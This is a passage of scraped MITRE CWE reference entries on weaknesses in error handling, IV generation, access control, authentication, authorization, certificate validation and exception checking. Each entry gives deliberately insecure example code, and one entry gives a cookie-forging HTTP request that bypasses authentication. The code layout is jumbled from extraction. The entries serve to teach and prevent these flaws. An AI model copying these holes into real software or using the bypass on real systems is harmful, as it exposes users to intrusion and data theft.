exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 In the following example, sensitive information might be printed depending on the exception that occurs. (bad code)
Example Language: Java
try {
/.../ }catch (Exception e) { System.out.println(e); }If an exception related to SQL is handled by the catch, then the output might contain sensitive information such as SQL query structure or private information. If this output is redirected to a web user, this may represent a security problem. Example 2 This code tries to open a database connection, and prints any exceptions that occur. (bad code)
Example Language: PHP
try {
openDbConnection(); }//print exception message that includes exception message and configuration file location catch (Exception $e) { echo 'Caught exception: ', $e->getMessage(), '\n'; }echo 'Check credentials in config file at: ', $Mysql_config_location, '\n'; If an exception occurs, the printed message exposes the location of the configuration file the script is using. An attacker can use this information to target the configuration file (perhaps exploiting a Path Traversal weakness). If the file can be read, the attacker could gain credentials for accessing the database. The attacker may also be able to replace the file with a malicious one, causing the application to use an arbitrary database. Example 3 The following code generates an error message that leaks the full pathname of the configuration file. If this code is running on a server, such as a web application, then the person making the request should not know what the full pathname of the configuration directory is. By submitting a username that does not produce a $file that exists, an attacker could get this pathname. It could then be used to exploit path traversal or symbolic link following problems that may exist elsewhere in the application. Example 4 In the example below, the method getUserBankAccount retrieves a bank account object from a database using the supplied username and account number to query the database. If an SQLException is raised when querying the database, an error message is created and output to a log file. (bad code)
Example Language: Java
public BankAccount getUserBankAccount(String username, String accountNumber) {
BankAccount userAccount = null;
String query = null; try { if (isAuthorizedUser(username)) { } catch (SQLException ex) {query = "SELECT * FROM accounts WHERE owner = " }+ username + " AND accountID = " + accountNumber; DatabaseManager dbManager = new DatabaseManager(); Connection conn = dbManager.getConnection(); Statement stmt = conn.createStatement(); ResultSet queryResult = stmt.executeQuery(query); userAccount = (BankAccount)queryResult.getObject(accountNumber); String logMessage = "Unable to retrieve account information from database,\nquery: " + query; }Logger.getLogger(BankManager.class.getName()).log(Level.SEVERE, logMessage, ex); return userAccount; The error message that is created includes information about the database query that may contain sensitive information about the database or query logic. In this case, the error message will expose the table name and column names used in the database. This data could be used to simplify other attacks, such as SQL injection (CWE-89) to directly access the database. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Other The sensitive information may be valuable information on its own (such as a password), or it may be useful for launching other, more serious attacks. The error message may be created in different ways:
CWE-329: Generation of Predictable IV with CBC Mode
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product generates and uses a predictable initialization Vector (IV) with Cipher Block Chaining (CBC) Mode, which causes algorithms to be susceptible to dictionary attacks when they are encrypted under the same key.
CBC mode eliminates a weakness of Electronic Code Book (ECB) mode by allowing identical plaintext blocks to be encrypted to different ciphertext blocks. This is possible by the XOR-ing of an IV with the initial plaintext block so that every plaintext block in the chain is XOR'd with a different value before encryption. If IVs are reused, then identical plaintexts would be encrypted to identical ciphertexts. However, even if IVs are not identical but are predictable, then they still break the security of CBC mode against Chosen Plaintext Attacks (CPA). This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 In the following examples, CBC mode is used when encrypting data: (bad code)
Example Language: C
EVP_CIPHER_CTX ctx;
char key[EVP_MAX_KEY_LENGTH]; char iv[EVP_MAX_IV_LENGTH]; RAND_bytes(key, b); memset(iv,0,EVP_MAX_IV_LENGTH); EVP_EncryptInit(&ctx,EVP_bf_cbc(), key,iv); (bad code)
Example Language: Java
public class SymmetricCipherTest {
public static void main() {
byte[] text ="Secret".getBytes(); byte[] iv ={ 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 };KeyGenerator kg = KeyGenerator.getInstance("DES"); kg.init(56); SecretKey key = kg.generateKey(); Cipher cipher = Cipher.getInstance("DES/CBC/PKCS5Padding"); IvParameterSpec ips = new IvParameterSpec(iv); cipher.init(Cipher.ENCRYPT_MODE, key, ips); return cipher.doFinal(inpBytes); In both of these examples, the initialization vector (IV) is always a block of zeros. This makes the resulting cipher text much more predictable and susceptible to a dictionary attack. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Maintenance
As of CWE 4.5, terminology related to randomness, entropy, and
predictability can vary widely. Within the developer and other
communities, "randomness" is used heavily. However, within
cryptography, "entropy" is distinct, typically implied as a
measurement. There are no commonly-used definitions, even within
standards documents and cryptography papers. Future versions of
CWE will attempt to define these terms and, if necessary,
distinguish between them in ways that are appropriate for
different communities but do not reduce the usability of CWE for
mapping, understanding, or other scenarios.
CWE-340: Generation of Predictable Numbers or Identifiers
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product uses a scheme that generates numbers or identifiers that are more predictable than required.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 This code generates a unique random identifier for a user's session. (bad code)
Example Language: PHP
function generateSessionID($userID){
srand($userID); }return rand(); Because the seed for the PRNG is always the user's ID, the session ID will always be the same. An attacker could thus predict any user's session ID and potentially hijack the session. This example also exhibits a Small Seed Space (CWE-339). Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Maintenance
As of CWE 4.5, terminology related to randomness, entropy, and
predictability can vary widely. Within the developer and other
communities, "randomness" is used heavily. However, within
cryptography, "entropy" is distinct, typically implied as a
measurement. There are no commonly-used definitions, even within
standards documents and cryptography papers. Future versions of
CWE will attempt to define these terms and, if necessary,
distinguish between them in ways that are appropriate for
different communities but do not reduce the usability of CWE for
mapping, understanding, or other scenarios.
CWE-284: Improper Access Control
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product does not restrict or incorrectly restricts access to a resource from an unauthorized actor.
Access control involves the use of several protection mechanisms such as:
When any mechanism is not applied or otherwise fails, attackers can compromise the security of the product by gaining privileges, reading sensitive information, executing commands, evading detection, etc. There are two distinct behaviors that can introduce access control weaknesses:
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Architectural Concepts" (View-1008)
Relevant to the view "CISQ Data Protection Measures" (View-1340)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 This code temporarily raises the program's privileges to allow creation of a new user folder. (bad code)
Example Language: Python
def makeNewUserDir(username):
While the program only raises its privilege level to create the folder and immediately lowers it again, if the call to os.mkdir() throws an exception, the call to lowerPrivileges() will not occur. As a result, the program is indefinitely operating in a raised privilege state, possibly allowing further exploitation to occur. Example 2 This function runs an arbitrary SQL query on a given database, returning the result of the query. (bad code)
Example Language: PHP
function runEmployeeQuery($dbName, $name){
mysql_select_db($dbName,$globalDbHandle) or die("Could not open Database".$dbName); }//Use a prepared statement to avoid CWE-89 $preparedStatement = $globalDbHandle->prepare('SELECT * FROM employees WHERE name = :name'); $preparedStatement->execute(array(':name' => $name)); return $preparedStatement->fetchAll(); /.../ $employeeRecord = runEmployeeQuery('EmployeeDB',$_GET['EmployeeName']); While this code is careful to avoid SQL Injection, the function does not confirm the user sending the query is authorized to do so. An attacker may be able to obtain sensitive employee information from the database. Example 3 In 2022, the OT:ICEFALL study examined products by 10 different Operational Technology (OT) vendors. The researchers reported 56 vulnerabilities and said that the products were "insecure by design" [REF-1283]. If exploited, these vulnerabilities often allowed adversaries to change how the products operated, ranging from denial of service to changing the code that the products executed. Since these products were often used in industries such as power, electrical, water, and others, there could even be safety implications. Multiple vendors did not use any authentication or used client-side authentication for critical functionality in their OT products. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Maintenance This entry needs more work. Possible sub-categories include:
CWE-287: Improper Authentication
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
Relevant to the view "CISQ Data Protection Measures" (View-1340)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following code intends to ensure that the user is already logged in. If not, the code performs authentication with the user-provided username and password. If successful, it sets the loggedin and user cookies to "remember" that the user has already logged in. Finally, the code performs administrator tasks if the logged-in user has the "Administrator" username, as recorded in the user cookie. (bad code)
Example Language: Perl
my $q = new CGI;
if ($q->cookie('loggedin') ne "true") { if (! AuthenticateUser($q->param('username'), $q->param('password'))) {
ExitError("Error: you need to log in first"); }else { # Set loggedin and user cookies.
$q->cookie( -name => 'loggedin',
-value => 'true' ); $q->cookie( -name => 'user',
-value => $q->param('username') ); if ($q->cookie('user') eq "Administrator") { DoAdministratorTasks(); }Unfortunately, this code can be bypassed. The attacker can set the cookies independently so that the code does not check the username and password. The attacker could do this with an HTTP request containing headers such as: (attack code)
GET /cgi-bin/vulnerable.cgi HTTP/1.1
Cookie: user=Administrator Cookie: loggedin=true [body of request] By setting the loggedin cookie to "true", the attacker bypasses the entire authentication check. By using the "Administrator" value in the user cookie, the attacker also gains privileges to administer the software. Example 2 In January 2009, an attacker was able to gain administrator access to a Twitter server because the server did not restrict the number of login attempts [REF-236]. The attacker targeted a member of Twitter's support team and was able to successfully guess the member's password using a brute force attack by guessing a large number of common words. After gaining access as the member of the support staff, the attacker used the administrator panel to gain access to 33 accounts that belonged to celebrities and politicians. Ultimately, fake Twitter messages were sent that appeared to come from the compromised accounts.
Example 3 In 2022, the OT:ICEFALL study examined products by 10 different Operational Technology (OT) vendors. The researchers reported 56 vulnerabilities and said that the products were "insecure by design" [REF-1283]. If exploited, these vulnerabilities often allowed adversaries to change how the products operated, ranging from denial of service to changing the code that the products executed. Since these products were often used in industries such as power, electrical, water, and others, there could even be safety implications. Multiple vendors did not use any authentication or used client-side authentication for critical functionality in their OT products. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-285: Improper Authorization
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Architectural Concepts" (View-1008)
Relevant to the view "CISQ Data Protection Measures" (View-1340)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 This function runs an arbitrary SQL query on a given database, returning the result of the query. (bad code)
Example Language: PHP
function runEmployeeQuery($dbName, $name){
mysql_select_db($dbName,$globalDbHandle) or die("Could not open Database".$dbName); }//Use a prepared statement to avoid CWE-89 $preparedStatement = $globalDbHandle->prepare('SELECT * FROM employees WHERE name = :name'); $preparedStatement->execute(array(':name' => $name)); return $preparedStatement->fetchAll(); /.../ $employeeRecord = runEmployeeQuery('EmployeeDB',$_GET['EmployeeName']); While this code is careful to avoid SQL Injection, the function does not confirm the user sending the query is authorized to do so. An attacker may be able to obtain sensitive employee information from the database. Example 2 The following program could be part of a bulletin board system that allows users to send private messages to each other. This program intends to authenticate the user before deciding whether a private message should be displayed. Assume that LookupMessageObject() ensures that the $id argument is numeric, constructs a filename based on that id, and reads the message details from that file. Also assume that the program stores all private messages for all users in the same directory. (bad code)
Example Language: Perl
sub DisplayPrivateMessage {
my($id) = @_; }my $Message = LookupMessageObject($id); print "From: " . encodeHTML($Message->{from}) . "<br>\n"; print "Subject: " . encodeHTML($Message->{subject}) . "\n"; print "<hr>\n"; print "Body: " . encodeHTML($Message->{body}) . "\n"; my $q = new CGI; # For purposes of this example, assume that CWE-309 and # CWE-523 do not apply. if (! AuthenticateUser($q->param('username'), $q->param('password'))) { ExitError("invalid username or password"); }my $id = $q->param('id'); DisplayPrivateMessage($id); While the program properly exits if authentication fails, it does not ensure that the message is addressed to the user. As a result, an authenticated attacker could provide any arbitrary identifier and read private messages that were intended for other users. One way to avoid this problem would be to ensure that the "to" field in the message object matches the username of the authenticated user. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Terminology
Assuming a user with a given identity, authorization is the process of determining whether that user can access a given resource, based on the user's privileges and any permissions or other access-control specifications that apply to the resource.
CWE-295: Improper Certificate Validation
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 This code checks the certificate of a connected peer. (bad code)
Example Language: C
if ((cert = SSL_get_peer_certificate(ssl)) && host)
foo=SSL_get_verify_result(ssl);
if ((X509_V_OK==foo) || X509_V_ERR_SELF_SIGNED_CERT_IN_CHAIN==foo)) // certificate looks good, host can be trusted In this case, because the certificate is self-signed, there was no external authority that could prove the identity of the host. The program could be communicating with a different system that is spoofing the host, e.g. by poisoning the DNS cache or using an Adversary-in-the-Middle (AITM) attack to modify the traffic from server to client. Example 2 The following OpenSSL code obtains a certificate and verifies it. (bad code)
Example Language: C
cert = SSL_get_peer_certificate(ssl);
if (cert && (SSL_get_verify_result(ssl)==X509_V_OK)) { // do secret things Even though the "verify" step returns X509_V_OK, this step does not include checking the Common Name against the name of the host. That is, there is no guarantee that the certificate is for the desired host. The SSL connection could have been established with a malicious host that provided a valid certificate. Example 3 The following OpenSSL code ensures that there is a certificate and allows the use of expired certificates. (bad code)
Example Language: C
if (cert = SSL_get_peer(certificate(ssl)) {
foo=SSL_get_verify_result(ssl);
if ((X509_V_OK==foo) || (X509_V_ERR_CERT_HAS_EXPIRED==foo)) //do stuff If the call to SSL_get_verify_result() returns X509_V_ERR_CERT_HAS_EXPIRED, this means that the certificate has expired. As time goes on, there is an increasing chance for attackers to compromise the certificate. Example 4 The following OpenSSL code ensures that there is a certificate before continuing execution. (bad code)
Example Language: C
if (cert = SSL_get_peer_certificate(ssl)) {
// got a certificate, do secret things Because this code does not use SSL_get_verify_results() to check the certificate, it could accept certificates that have been revoked (X509_V_ERR_CERT_REVOKED). The software could be communicating with a malicious host. Example 5 The following OpenSSL code ensures that the host has a certificate. (bad code)
Example Language: C
if (cert = SSL_get_peer_certificate(ssl)) {
// got certificate, host can be trusted //foo=SSL_get_verify_result(ssl); //if (X509_V_OK==foo) ... Note that the code does not call SSL_get_verify_result(ssl), which effectively disables the validation step that checks the certificate. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-299: Improper Check for Certificate Revocation
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product does not check or incorrectly checks the revocation status of a certificate, which may cause it to use a certificate that has been compromised.
An improper check for certificate revocation is a far more serious flaw than related certificate failures. This is because the use of any revoked certificate is almost certainly malicious. The most common reason for certificate revocation is compromise of the system in question, with the result that no legitimate servers will be using a revoked certificate, unless they are sorely out of sync.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following OpenSSL code ensures that there is a certificate before continuing execution. (bad code)
Example Language: C
if (cert = SSL_get_peer_certificate(ssl)) {
// got a certificate, do secret things Because this code does not use SSL_get_verify_results() to check the certificate, it could accept certificates that have been revoked (X509_V_ERR_CERT_REVOKED). The product could be communicating with a malicious host. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-754: Improper Check for Unusual or Exceptional Conditions
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product does not check or incorrectly checks for unusual or exceptional conditions that are not expected to occur frequently during day to day operation of the product.
The programmer may assume that certain events or conditions will never occur or do not need to be worried about, such as low memory conditions, lack of access to resources due to restrictive permissions, or misbehaving clients or components. However, attackers may intentionally trigger these unusual conditions, thus violating the programmer's assumptions, possibly introducing instability, incorrect behavior, or a vulnerability. Note that this entry is not exclusively about the use of exceptions and exception handling, which are mechanisms for both checking and handling unusual or unexpected conditions. This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 Consider the following code segment: (bad code)
Example Language: C
char buf[10], cp_buf[10];
fgets(buf, 10, stdin); strcpy(cp_buf, buf); The programmer expects that when fgets() returns, buf will contain a null-terminated string of length 9 or less. But if an I/O error occurs, fgets() will not null-terminate buf. Furthermore, if the end of the file is reached before any characters are read, fgets() returns without writing anything to buf. In both of these situations, fgets() signals that something unusual has happened by returning NULL, but in this code, the warning will not be noticed. The lack of a null terminator in buf can result in a buffer overflow in the subsequent call to strcpy(). Example 2 The following code does not check to see if memory allocation succeeded before attempting to use the pointer returned by malloc(). (bad code)
Example Language: C
buf = (char*) malloc(req_size);
strncpy(buf, xfer, req_size); The traditional defense of this coding error is: "If my program runs out of memory, it will fail. It doesn't matter whether I handle the error or simply allow the program to die with a segmentation fault when it tries to dereference the null pointer." This argument ignores three important considerations:
Example 3 The following examples read a file into a byte array. (bad code)
Example Language: C#
char[] byteArray = new char[1024];
for (IEnumerator i=users.GetEnumerator(); i.MoveNext() ;i.Current()) { String userName = (String) i.Current(); }String pFileName = PFILE_ROOT + "/" + userName; StreamReader sr = new StreamReader(pFileName); sr.Read(byteArray,0,1024);//the file is always 1k bytes sr.Close(); processPFile(userName, byteArray); (bad code)
Example Language: Java
FileInputStream fis;
byte[] byteArray = new byte[1024]; for (Iterator i=users.iterator(); i.hasNext();) { String userName = (String) i.next();
